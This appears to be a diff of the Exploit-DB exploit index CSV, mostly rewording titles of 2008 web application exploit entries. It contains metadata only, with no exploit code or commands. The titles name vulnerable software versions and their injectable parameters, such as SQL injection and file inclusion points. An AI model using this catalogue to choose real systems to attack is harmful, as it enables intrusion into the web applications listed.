-5745,platforms/php/webapps/5745.txt,"pSys 0.7.0.a - 'shownews' Parameter SQL Injection",2008-06-05,anonymous,php,webapps,0 -5748,platforms/php/webapps/5748.txt,"Joomla! Component JoomlaDate 1.2 - 'user' Parameter SQL Injection",2008-06-05,His0k4,php,webapps,0 +5744,platforms/php/webapps/5744.txt,"Power Phlogger 2.2.5 - 'css_str' SQL Injection",2008-06-05,MustLive,php,webapps,0 +5745,platforms/php/webapps/5745.txt,"pSys 0.7.0.a - 'shownews' SQL Injection",2008-06-05,anonymous,php,webapps,0 +5748,platforms/php/webapps/5748.txt,"Joomla! Component JoomlaDate 1.2 - 'user' SQL Injection",2008-06-05,His0k4,php,webapps,0 5752,platforms/php/webapps/5752.pl,"Joomla! Component GameQ 4.0 - SQL Injection",2008-06-07,His0k4,php,webapps,0 -5753,platforms/asp/webapps/5753.txt,"JiRo's FAQ Manager eXperience 1.0 - 'fID' Parameter SQL Injection",2008-06-08,Zigma,asp,webapps,0 +5753,platforms/asp/webapps/5753.txt,"JiRo's FAQ Manager eXperience 1.0 - 'fID' SQL Injection",2008-06-08,Zigma,asp,webapps,0 5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - Local File Inclusion / Cross-Site Scripting",2008-06-08,"CWH Underground",php,webapps,0 5755,platforms/php/webapps/5755.pl,"Joomla! Component yvComment 1.16 - Blind SQL Injection",2008-06-08,His0k4,php,webapps,0 5756,platforms/php/webapps/5756.txt,"XOOPS Module Uploader 1.1 - 'Filename' File Disclosure",2008-06-08,MEEKAAH,php,webapps,0 @@ -19684,117 +19685,117 @@ id,file,description,date,author,platform,type,port 5758,platforms/php/webapps/5758.txt,"Galatolo Web Manager 1.0 - Cross-Site Scripting / Local File Inclusion",2008-06-08,StAkeR,php,webapps,0 5759,platforms/php/webapps/5759.txt,"Joomla! Component Rapid Recipe 1.6.6/1.6.7 - SQL Injection",2008-06-08,His0k4,php,webapps,0 5760,platforms/php/webapps/5760.pl,"Galatolo Web Manager 1.0 - SQL Injection",2008-06-09,Stack,php,webapps,0 -5761,platforms/php/webapps/5761.pl,"Joomla! Component iJoomla News Portal 1.0 - 'itemID' Parameter SQL Injection",2008-06-09,"ilker Kandemir",php,webapps,0 +5761,platforms/php/webapps/5761.pl,"Joomla! Component iJoomla News Portal 1.0 - 'itemID' SQL Injection",2008-06-09,"ilker Kandemir",php,webapps,0 5762,platforms/php/webapps/5762.txt,"ProManager 0.73 - 'config.php' Local File Inclusion",2008-06-09,Stack,php,webapps,0 5763,platforms/asp/webapps/5763.txt,"real estate Web site 1.0 - SQL Injection / Cross-Site Scripting",2008-06-09,JosS,asp,webapps,0 5764,platforms/php/webapps/5764.txt,"Telephone Directory 2008 - SQL Injection / Cross-Site Scripting",2008-06-09,"CWH Underground",php,webapps,0 -5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 - 'article' Parameter SQL Injection",2008-06-09,Bl@ckbe@rD,asp,webapps,0 +5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 - 'article' SQL Injection",2008-06-09,Bl@ckbe@rD,asp,webapps,0 5766,platforms/php/webapps/5766.txt,"realm CMS 2.3 - Multiple Vulnerabilities",2008-06-09,BugReport.IR,php,webapps,0 5767,platforms/php/webapps/5767.php,"Flux CMS 1.5.0 - 'loadsave.php' Arbitrary File Overwrite",2008-06-09,EgiX,php,webapps,0 -5768,platforms/php/webapps/5768.txt,"pNews 2.08 - 'shownews' Parameter SQL Injection",2008-06-09,Cr@zy_King,php,webapps,0 +5768,platforms/php/webapps/5768.txt,"pNews 2.08 - 'shownews' SQL Injection",2008-06-09,Cr@zy_King,php,webapps,0 5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0 5770,platforms/php/webapps/5770.php,"Achievo 1.3.2 - 'FCKeditor' Arbitrary File Upload",2008-06-09,EgiX,php,webapps,0 5771,platforms/php/webapps/5771.txt,"ErfurtWiki R1.02b - Local File Inclusion",2008-06-10,Unohope,php,webapps,0 5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 - SQL Injection",2008-06-10,Unohope,php,webapps,0 5773,platforms/php/webapps/5773.txt,"Yblog 0.2.2.2 - Cross-Site Scripting / SQL Injection",2008-06-10,Unohope,php,webapps,0 5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - SQL Injection",2008-06-10,Unohope,php,webapps,0 -5775,platforms/asp/webapps/5775.txt,"ASPPortal Free Version - 'Topic_Id' Parameter SQL Injection",2008-06-10,JosS,asp,webapps,0 +5775,platforms/asp/webapps/5775.txt,"ASPPortal Free Version - 'Topic_Id' SQL Injection",2008-06-10,JosS,asp,webapps,0 5776,platforms/php/webapps/5776.txt,"Experts 1.0.0 - 'answer.php' SQL Injection",2008-06-10,"CWH Underground",php,webapps,0 5779,platforms/php/webapps/5779.txt,"SyndeoCMS 2.6.0 - Local File Inclusion / Cross-Site Scripting",2008-06-10,"CWH Underground",php,webapps,0 5780,platforms/asp/webapps/5780.txt,"ASP Download 1.03 - Arbitrary Change Administrator Account",2008-06-10,Zigma,asp,webapps,0 5781,platforms/asp/webapps/5781.txt,"Todd Woolums ASP News Management 2.2 - SQL Injection",2008-06-10,Bl@ckbe@rD,asp,webapps,0 5782,platforms/php/webapps/5782.txt,"TNT Forum 0.9.4 - Local File Inclusion",2008-06-10,"CWH Underground",php,webapps,0 -5783,platforms/php/webapps/5783.txt,"Yuhhu 2008 SuperStar - 'board' Parameter SQL Injection",2008-06-10,RMx,php,webapps,0 -5784,platforms/php/webapps/5784.txt,"FOG Forum 0.8.1 - Multiple Local File Inclusion",2008-06-11,"CWH Underground",php,webapps,0 +5783,platforms/php/webapps/5783.txt,"Yuhhu 2008 SuperStar - 'board' SQL Injection",2008-06-10,RMx,php,webapps,0 +5784,platforms/php/webapps/5784.txt,"FOG Forum 0.8.1 - Multiple Local File Inclusions",2008-06-11,"CWH Underground",php,webapps,0 5785,platforms/php/webapps/5785.txt,"eFiction 3.0 - 'toplists.php' SQL Injection",2008-06-11,Mr.SQL,php,webapps,0 5786,platforms/php/webapps/5786.txt,"IPTBB 0.5.6 - Arbitrary Add Admin",2008-06-11,"CWH Underground",php,webapps,0 5787,platforms/php/webapps/5787.txt,"MycroCMS 0.5 - Blind SQL Injection",2008-06-11,"CWH Underground",php,webapps,0 5788,platforms/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,php,webapps,0 -5789,platforms/php/webapps/5789.pl,"JAMM CMS - 'id' Parameter Blind SQL Injection",2008-06-11,anonymous,php,webapps,0 +5789,platforms/php/webapps/5789.pl,"JAMM CMS - 'id' Blind SQL Injection",2008-06-11,anonymous,php,webapps,0 5791,platforms/php/webapps/5791.txt,"Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting",2008-06-12,"CWH Underground",php,webapps,0 -5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC - Multiple Local File Inclusion",2008-06-12,"CWH Underground",php,webapps,0 +5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC - Multiple Local File Inclusions",2008-06-12,"CWH Underground",php,webapps,0 5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 - 'results.php' SQL Injection",2008-06-12,anonymous,php,webapps,0 -5796,platforms/php/webapps/5796.php,"GLLCTS2 < 4.2.4 - 'detail' Parameter SQL Injection",2008-06-12,TheDefaced,php,webapps,0 +5796,platforms/php/webapps/5796.php,"GLLCTS2 < 4.2.4 - 'detail' SQL Injection",2008-06-12,TheDefaced,php,webapps,0 5797,platforms/php/webapps/5797.txt,"Butterfly ORGanizer 2.0.0 - SQL Injection / Cross-Site Scripting",2008-06-13,"CWH Underground",php,webapps,0 5798,platforms/php/webapps/5798.pl,"WebChamado 1.1 - Arbitrary Add Admin",2008-06-13,"CWH Underground",php,webapps,0 -5799,platforms/php/webapps/5799.pl,"Mambo Component Galleries 1.0 - 'aid' Parameter SQL Injection",2008-06-13,Houssamix,php,webapps,0 +5799,platforms/php/webapps/5799.pl,"Mambo Component Galleries 1.0 - 'aid' SQL Injection",2008-06-13,Houssamix,php,webapps,0 5800,platforms/php/webapps/5800.pl,"Butterfly ORGanizer 2.0.0 - Arbitrary Delete (Category/Account)",2008-06-13,Stack,php,webapps,0 -5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - 'section' Parameter Local File Inclusion",2008-06-13,Loader007,php,webapps,0 -5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - 'tsk_id' Parameter SQL Injection",2008-06-13,"Virangar Security",php,webapps,0 -5803,platforms/php/webapps/5803.txt,"Pre News Manager 1.0 - 'id' Parameter SQL Injection",2008-06-13,K-159,php,webapps,0 +5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - 'section' Local File Inclusion",2008-06-13,Loader007,php,webapps,0 +5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - 'tsk_id' SQL Injection",2008-06-13,"Virangar Security",php,webapps,0 +5803,platforms/php/webapps/5803.txt,"Pre News Manager 1.0 - 'id' SQL Injection",2008-06-13,K-159,php,webapps,0 5804,platforms/php/webapps/5804.txt,"Pre ADS Portal 2.0 - SQL Injection",2008-06-13,K-159,php,webapps,0 5805,platforms/asp/webapps/5805.txt,"E-Smart Cart - 'productsofcat.asp' SQL Injection",2008-06-13,JosS,asp,webapps,0 -5806,platforms/php/webapps/5806.pl,"GLLCTS2 - 'sort' Parameter Blind SQL Injection",2008-06-13,anonymous,php,webapps,0 +5806,platforms/php/webapps/5806.pl,"GLLCTS2 - 'sort' Blind SQL Injection",2008-06-13,anonymous,php,webapps,0 5807,platforms/php/webapps/5807.txt,"PHP JOBWEBSITE PRO - 'JobSearch3.php' SQL Injection",2008-06-13,JosS,php,webapps,0 5808,platforms/php/webapps/5808.txt,"Mambo 4.6.4 - 'Output.php' Remote File Inclusion",2008-06-13,irk4z,php,webapps,0 5809,platforms/php/webapps/5809.txt,"Pre Job Board - 'JobSearch.php' SQL Injection",2008-06-14,JosS,php,webapps,0 5810,platforms/php/webapps/5810.txt,"Contenido 4.8.4 - Remote File Inclusion / Cross-Site Scripting",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0 5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple SQL Injections",2008-06-14,"CWH Underground",php,webapps,0 -5812,platforms/php/webapps/5812.txt,"PHPMyCart 1.3 - 'cat' Parameter SQL Injection",2008-06-14,anonymous,php,webapps,0 -5813,platforms/php/webapps/5813.txt,"SHOUTcast Admin Panel 2.0 - 'page' Parameter Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0 -5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - 'prodId' Parameter Blind SQL Injection",2008-06-14,anonymous,php,webapps,0 -5816,platforms/php/webapps/5816.pl,"DIY - 'did' Parameter Blind SQL Injection",2008-06-14,Mr.SQL,php,webapps,0 +5812,platforms/php/webapps/5812.txt,"PHPMyCart 1.3 - 'cat' SQL Injection",2008-06-14,anonymous,php,webapps,0 +5813,platforms/php/webapps/5813.txt,"SHOUTcast Admin Panel 2.0 - 'page' Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0 +5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - 'prodId' Blind SQL Injection",2008-06-14,anonymous,php,webapps,0 +5816,platforms/php/webapps/5816.pl,"DIY - 'did' Blind SQL Injection",2008-06-14,Mr.SQL,php,webapps,0 5818,platforms/php/webapps/5818.txt,"xeCMS 1.0.0 RC2 - Insecure Cookie Handling",2008-06-14,t0pP8uZz,php,webapps,0 5819,platforms/php/webapps/5819.txt,"ezcms 1.2 - Blind SQL Injection / Authentication Bypass",2008-06-14,t0pP8uZz,php,webapps,0 -5820,platforms/php/webapps/5820.txt,"PHPEasyNews 1.13 RC2 - 'POST' Parameter SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0 +5820,platforms/php/webapps/5820.txt,"PHPEasyNews 1.13 RC2 - 'POST' SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0 5821,platforms/php/webapps/5821.txt,"Alstrasoft AskMe Pro 2.1 - Multiple SQL Injections",2008-06-14,t0pP8uZz,php,webapps,0 -5822,platforms/php/webapps/5822.txt,"Devalcms 1.4a - 'currentfile' Parameter Local File Inclusion",2008-06-15,"CWH Underground",php,webapps,0 +5822,platforms/php/webapps/5822.txt,"Devalcms 1.4a - 'currentfile' Local File Inclusion",2008-06-15,"CWH Underground",php,webapps,0 5823,platforms/php/webapps/5823.txt,"Advanced Webhost Billing System (AWBS) 2.7.1 - 'news.php' SQL Injection",2008-06-15,Mr.SQL,php,webapps,0 5824,platforms/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",php,webapps,0 5826,platforms/php/webapps/5826.py,"Simple Machines Forum (SMF) 1.1.4 - SQL Injection",2008-06-15,The:Paradox,php,webapps,0 -5828,platforms/php/webapps/5828.txt,"Oxygen 2.0 - 'repquote' Parameter SQL Injection",2008-06-15,anonymous,php,webapps,0 +5828,platforms/php/webapps/5828.txt,"Oxygen 2.0 - 'repquote' SQL Injection",2008-06-15,anonymous,php,webapps,0 5829,platforms/php/webapps/5829.txt,"SH-News 3.0 - Insecure Cookie Handling",2008-06-15,"Virangar Security",php,webapps,0 5830,platforms/php/webapps/5830.txt,"Nitro Web Gallery 1.4.3 - (section) SQL Injection",2008-06-16,Mr.SQL,php,webapps,0 -5831,platforms/php/webapps/5831.txt,"Open Azimyt CMS 0.22 - 'lang' Parameter Local File Inclusion",2008-06-16,DSecRG,php,webapps,0 +5831,platforms/php/webapps/5831.txt,"Open Azimyt CMS 0.22 - 'lang' Local File Inclusion",2008-06-16,DSecRG,php,webapps,0 5832,platforms/php/webapps/5832.pl,"MyMarket 1.72 - Blind SQL Injection",2008-06-16,anonymous,php,webapps,0 -5833,platforms/php/webapps/5833.txt,"Joomla! Component Simple Shop Galore 3.x - 'catid' Parameter SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0 +5833,platforms/php/webapps/5833.txt,"Joomla! Component Simple Shop Galore 3.x - 'catid' SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0 5834,platforms/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 -5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 - 'Id' Parameter SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 +5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 - 'Id' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5836,platforms/php/webapps/5836.txt,"Basic-CMS - SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5838,platforms/php/webapps/5838.txt,"FreeCMS.us 0.2 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 -5839,platforms/php/webapps/5839.txt,"ClipShare < 3.0.1 - 'tid' Parameter SQL Injection",2008-06-17,SuNHouSe2,php,webapps,0 -5840,platforms/php/webapps/5840.txt,"easyTrade 2.x - 'id' Parameter SQL Injection",2008-06-17,anonymous,php,webapps,0 +5839,platforms/php/webapps/5839.txt,"ClipShare < 3.0.1 - 'tid' SQL Injection",2008-06-17,SuNHouSe2,php,webapps,0 +5840,platforms/php/webapps/5840.txt,"easyTrade 2.x - 'id' SQL Injection",2008-06-17,anonymous,php,webapps,0 5841,platforms/php/webapps/5841.txt,"ThaiQuickCart 3 - 'sLanguage' Cookie Local File Inclusion",2008-06-17,"CWH Underground",php,webapps,0 5842,platforms/php/webapps/5842.txt,"PHP Site Lock 2.0 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 - 'FCKeditor' Arbitrary File Upload",2008-06-17,Stack,php,webapps,0 5845,platforms/php/webapps/5845.txt,"MyShoutPro 1.2 - Final Insecure Cookie Handling",2008-06-17,Stack,php,webapps,0 -5846,platforms/php/webapps/5846.txt,"eroCMS 1.4 - 'site' Parameter SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 -5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 - 'includedir' Parameter Remote File Inclusion",2008-06-17,Cr@zy_King,php,webapps,0 +5846,platforms/php/webapps/5846.txt,"eroCMS 1.4 - 'site' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 +5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 - 'includedir' Remote File Inclusion",2008-06-17,Cr@zy_King,php,webapps,0 5848,platforms/php/webapps/5848.txt,"traindepot 0.1 - Local File Inclusion / Cross-Site Scripting",2008-06-18,"CWH Underground",php,webapps,0 5849,platforms/asp/webapps/5849.txt,"doITlive CMS 2.50 - SQL Injection / Cross-Site Scripting",2008-06-18,BugReport.IR,asp,webapps,0 5850,platforms/asp/webapps/5850.txt,"AspWebCalendar 2008 - Arbitrary File Upload",2008-06-18,Alemin_Krali,asp,webapps,0 -5852,platforms/php/webapps/5852.txt,"netBIOS - 'newsid' Parameter SQL Injection",2008-06-18,"security fears team",php,webapps,0 -5853,platforms/php/webapps/5853.txt,"Maxtrade AIO 1.3.23 - 'categori' Parameter SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 -5854,platforms/php/webapps/5854.txt,"Mybizz-Classifieds - 'cat' Parameter SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 +5852,platforms/php/webapps/5852.txt,"netBIOS - 'newsid' SQL Injection",2008-06-18,"security fears team",php,webapps,0 +5853,platforms/php/webapps/5853.txt,"Maxtrade AIO 1.3.23 - 'categori' SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 +5854,platforms/php/webapps/5854.txt,"Mybizz-Classifieds - 'cat' SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 5855,platforms/php/webapps/5855.txt,"Easy Webstore 1.2 - SQL Injection",2008-06-18,Mr.SQL,php,webapps,0 5856,platforms/php/webapps/5856.txt,"nweb2fax 0.2.7 - Multiple Vulnerabilities",2008-06-18,dun,php,webapps,0 -5857,platforms/php/webapps/5857.txt,"Carscripts Classifieds - 'cat' Parameter SQL Injection",2008-06-18,Stack,php,webapps,0 -5858,platforms/php/webapps/5858.txt,"BoatScripts Classifieds - 'type' Parameter SQL Injection",2008-06-18,Stack,php,webapps,0 +5857,platforms/php/webapps/5857.txt,"Carscripts Classifieds - 'cat' SQL Injection",2008-06-18,Stack,php,webapps,0 +5858,platforms/php/webapps/5858.txt,"BoatScripts Classifieds - 'type' SQL Injection",2008-06-18,Stack,php,webapps,0 5859,platforms/php/webapps/5859.txt,"eLineStudio Site Composer (ESC) 2.6 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps,0 5860,platforms/php/webapps/5860.txt,"OwnRS blog beta3 - SQL Injection / Cross-Site Scripting",2008-06-19,"CWH Underground",php,webapps,0 5861,platforms/php/webapps/5861.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps,0 -5862,platforms/php/webapps/5862.txt,"samart-cms 2.0 - 'contentsid' Parameter SQL Injection",2008-06-19,dun,php,webapps,0 -5863,platforms/php/webapps/5863.txt,"CMS-BRD - 'menuclick' Parameter SQL Injection",2008-06-19,dun,php,webapps,0 +5862,platforms/php/webapps/5862.txt,"samart-cms 2.0 - 'contentsid' SQL Injection",2008-06-19,dun,php,webapps,0 +5863,platforms/php/webapps/5863.txt,"CMS-BRD - 'menuclick' SQL Injection",2008-06-19,dun,php,webapps,0 5864,platforms/php/webapps/5864.txt,"Orlando CMS 0.6 - Remote File Inclusion",2008-06-19,Ciph3r,php,webapps,0 5865,platforms/php/webapps/5865.txt,"CaupoShop Classic 1.3 - 'saArticle[ID]' SQL Injection",2008-06-19,anonymous,php,webapps,0 5866,platforms/php/webapps/5866.txt,"Lotus Core CMS 1.0.1 - Remote File Inclusion",2008-06-19,Ciph3r,php,webapps,0 -5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 - 'cate_id' Parameter SQL Injection",2008-06-19,"Hussin X",php,webapps,0 -5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - 'id' Parameter SQL Injection",2008-06-19,"Hussin X",php,webapps,0 +5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 - 'cate_id' SQL Injection",2008-06-19,"Hussin X",php,webapps,0 +5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - 'id' SQL Injection",2008-06-19,"Hussin X",php,webapps,0 5869,platforms/asp/webapps/5869.txt,"Virtual Support Office XP 3.0.29 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,asp,webapps,0 5870,platforms/php/webapps/5870.txt,"GL-SH Deaf Forum 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 5872,platforms/php/webapps/5872.txt,"FubarForum 1.5 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 5873,platforms/php/webapps/5873.txt,"Lightweight news portal (LNP) 1.0b - Multiple Vulnerabilities",2008-06-20,storm,php,webapps,0 -5874,platforms/php/webapps/5874.txt,"IPTBB 0.5.6 - 'act' Parameter Local File Inclusion",2008-06-20,storm,php,webapps,0 -5875,platforms/php/webapps/5875.txt,"CiBlog 3.1 - 'id' Parameter SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 +5874,platforms/php/webapps/5874.txt,"IPTBB 0.5.6 - 'act' Local File Inclusion",2008-06-20,storm,php,webapps,0 +5875,platforms/php/webapps/5875.txt,"CiBlog 3.1 - 'id' SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 5876,platforms/php/webapps/5876.txt,"Jamroom 3.3.5 - Remote File Inclusion",2008-06-20,cyberlog,php,webapps,0 5877,platforms/php/webapps/5877.txt,"jaxultrabb 2.0 - Local File Inclusion / Cross-Site Scripting",2008-06-20,"CWH Underground",php,webapps,0 -5878,platforms/php/webapps/5878.txt,"emuCMS 0.3 - 'cat_id' Parameter SQL Injection",2008-06-20,TurkishWarriorr,php,webapps,0 +5878,platforms/php/webapps/5878.txt,"emuCMS 0.3 - 'cat_id' SQL Injection",2008-06-20,TurkishWarriorr,php,webapps,0 5879,platforms/php/webapps/5879.txt,"phpAuction - 'profile.php' SQL Injection (1)",2008-06-20,Mr.SQL,php,webapps,0 5880,platforms/php/webapps/5880.txt,"SiteXS CMS 0.1.1 - Arbitrary File Upload / Cross-Site Scripting",2008-06-21,"CWH Underground",php,webapps,0 5881,platforms/php/webapps/5881.txt,"@CMS 2.1.1 - SQL Injection",2008-06-21,Mr.SQL,php,webapps,0 5882,platforms/php/webapps/5882.txt,"eNews 0.1 - 'delete.php' Arbitrary Delete Post",2008-06-21,"ilker Kandemir",php,webapps,0 -5883,platforms/php/webapps/5883.txt,"PHP KnowledgeBase Script 2.4 - 'cat_id' Parameter SQL Injection",2008-06-21,"S.L TEAM",php,webapps,0 +5883,platforms/php/webapps/5883.txt,"PHP KnowledgeBase Script 2.4 - 'cat_id' SQL Injection",2008-06-21,"S.L TEAM",php,webapps,0 5884,platforms/php/webapps/5884.txt,"Aprox CMS Engine 5.1.0.4 - Local File Inclusion",2008-06-21,SkyOut,php,webapps,0 5885,platforms/php/webapps/5885.pl,"Scientific Image DataBase 0.41 - Blind SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0 5886,platforms/php/webapps/5886.pl,"LaserNet CMS 1.5 - Arbitrary File Upload",2008-06-21,t0pP8uZz,php,webapps,0 @@ -19803,78 +19804,78 @@ id,file,description,date,author,platform,type,port 5889,platforms/php/webapps/5889.txt,"Online Fantasy Football League (OFFL) 0.2.6 - 'teams.php' SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0 5890,platforms/php/webapps/5890.txt,"AJ HYIP ACME - 'news.php' SQL Injection",2008-06-21,"Hussin X",php,webapps,0 5892,platforms/php/webapps/5892.txt,"phpAuction 3.2.1 - 'item.php' SQL Injection",2008-06-21,"Hussin X",php,webapps,0 -5893,platforms/php/webapps/5893.txt,"Joomla! Component EXP Shop - 'catid' Parameter SQL Injection",2008-06-22,His0k4,php,webapps,0 -5894,platforms/asp/webapps/5894.txt,"DUdForum 3.0 - 'iFor' Parameter SQL Injection",2008-06-22,Bl@ckbe@rD,asp,webapps,0 +5893,platforms/php/webapps/5893.txt,"Joomla! Component EXP Shop - 'catid' SQL Injection",2008-06-22,His0k4,php,webapps,0 +5894,platforms/asp/webapps/5894.txt,"DUdForum 3.0 - 'iFor' SQL Injection",2008-06-22,Bl@ckbe@rD,asp,webapps,0 5895,platforms/php/webapps/5895.txt,"shibby shop 2.2 - Multiple Vulnerabilities",2008-06-22,KnocKout,php,webapps,0 -5896,platforms/php/webapps/5896.txt,"CMS Mini 0.2.2 - Multiple Local File Inclusion",2008-06-22,"CWH Underground",php,webapps,0 -5897,platforms/php/webapps/5897.txt,"phpDMCA 1.0.0 - Multiple Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 +5896,platforms/php/webapps/5896.txt,"CMS Mini 0.2.2 - Multiple Local File Inclusions",2008-06-22,"CWH Underground",php,webapps,0 +5897,platforms/php/webapps/5897.txt,"phpDMCA 1.0.0 - Multiple Remote File Inclusions",2008-06-22,CraCkEr,php,webapps,0 5898,platforms/php/webapps/5898.pl,"IGSuite 3.2.4 - (reverse shell) Blind SQL Injection",2008-06-22,"Guido Landi",php,webapps,0 5899,platforms/php/webapps/5899.txt,"PageSquid CMS 0.3 Beta - 'index.php' SQL Injection",2008-06-22,"CWH Underground",php,webapps,0 -5900,platforms/php/webapps/5900.txt,"RSS-aggregator - 'path' Parameter Remote File Inclusion",2008-06-22,"Ghost Hacker",php,webapps,0 -5901,platforms/php/webapps/5901.txt,"MiGCMS 2.0.5 - Multiple Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 +5900,platforms/php/webapps/5900.txt,"RSS-aggregator - 'path' Remote File Inclusion",2008-06-22,"Ghost Hacker",php,webapps,0 +5901,platforms/php/webapps/5901.txt,"MiGCMS 2.0.5 - Multiple Remote File Inclusions",2008-06-22,CraCkEr,php,webapps,0 5902,platforms/php/webapps/5902.txt,"HoMaP-CMS 0.1 - 'plugin_admin.php' Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5903,platforms/php/webapps/5903.txt,"HomePH Design 2.10 RC2 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2008-06-22,CraCkEr,php,webapps,0 5904,platforms/php/webapps/5904.txt,"Hedgehog-CMS 1.21 - 'header.php' Local File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5905,platforms/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - Local File Inclusion / Cross-Site Scripting",2008-06-22,CraCkEr,php,webapps,0 5906,platforms/php/webapps/5906.txt,"odars CMS 1.0.2 - Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 - 'FCKeditor' Arbitrary File Upload",2008-06-23,Stack,php,webapps,0 -5908,platforms/php/webapps/5908.txt,"HoMaP-CMS 0.1 - 'go' Parameter SQL Injection",2008-06-23,SxCx,php,webapps,0 +5908,platforms/php/webapps/5908.txt,"HoMaP-CMS 0.1 - 'go' SQL Injection",2008-06-23,SxCx,php,webapps,0 5909,platforms/php/webapps/5909.pl,"BlogPHP 2.0 - Privilege Escalation (via SQL Injection)",2008-06-23,Cod3rZ,php,webapps,0 -5910,platforms/php/webapps/5910.txt,"Ready2Edit - 'menuid' Parameter SQL Injection",2008-06-23,Mr.SQL,php,webapps,0 -5911,platforms/php/webapps/5911.txt,"ResearchGuide 0.5 - 'id' Parameter SQL Injection",2008-06-23,dun,php,webapps,0 -5912,platforms/asp/webapps/5912.txt,"MVC-Web CMS 1.0/1.2 - 'newsid' Parameter SQL Injection",2008-06-23,Bl@ckbe@rD,asp,webapps,0 +5910,platforms/php/webapps/5910.txt,"Ready2Edit - 'menuid' SQL Injection",2008-06-23,Mr.SQL,php,webapps,0 +5911,platforms/php/webapps/5911.txt,"ResearchGuide 0.5 - 'id' SQL Injection",2008-06-23,dun,php,webapps,0 +5912,platforms/asp/webapps/5912.txt,"MVC-Web CMS 1.0/1.2 - 'newsid' SQL Injection",2008-06-23,Bl@ckbe@rD,asp,webapps,0 5913,platforms/php/webapps/5913.txt,"MyBlog: PHP and MySQL Blog/CMS software - SQL Injection / Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps,0 -5914,platforms/php/webapps/5914.txt,"Demo4 CMS - 'id' Parameter SQL Injection",2008-06-23,"CWH Underground",php,webapps,0 +5914,platforms/php/webapps/5914.txt,"Demo4 CMS - 'id' SQL Injection",2008-06-23,"CWH Underground",php,webapps,0 5915,platforms/php/webapps/5915.txt,"Joomla! Component FacileForms 1.4.4 - Remote File Inclusion",2008-06-23,Kacak,php,webapps,0 -5916,platforms/php/webapps/5916.txt,"Dagger CMS 2008 - 'dir_inc' Parameter Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 +5916,platforms/php/webapps/5916.txt,"Dagger CMS 2008 - 'dir_inc' Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 5917,platforms/php/webapps/5917.txt,"TinXCMS 1.1 - Local File Inclusion / Cross-Site Scripting",2008-06-23,CraCkEr,php,webapps,0 5919,platforms/php/webapps/5919.txt,"mm chat 1.5 - Local File Inclusion / Cross-Site Scripting",2008-06-23,CraCkEr,php,webapps,0 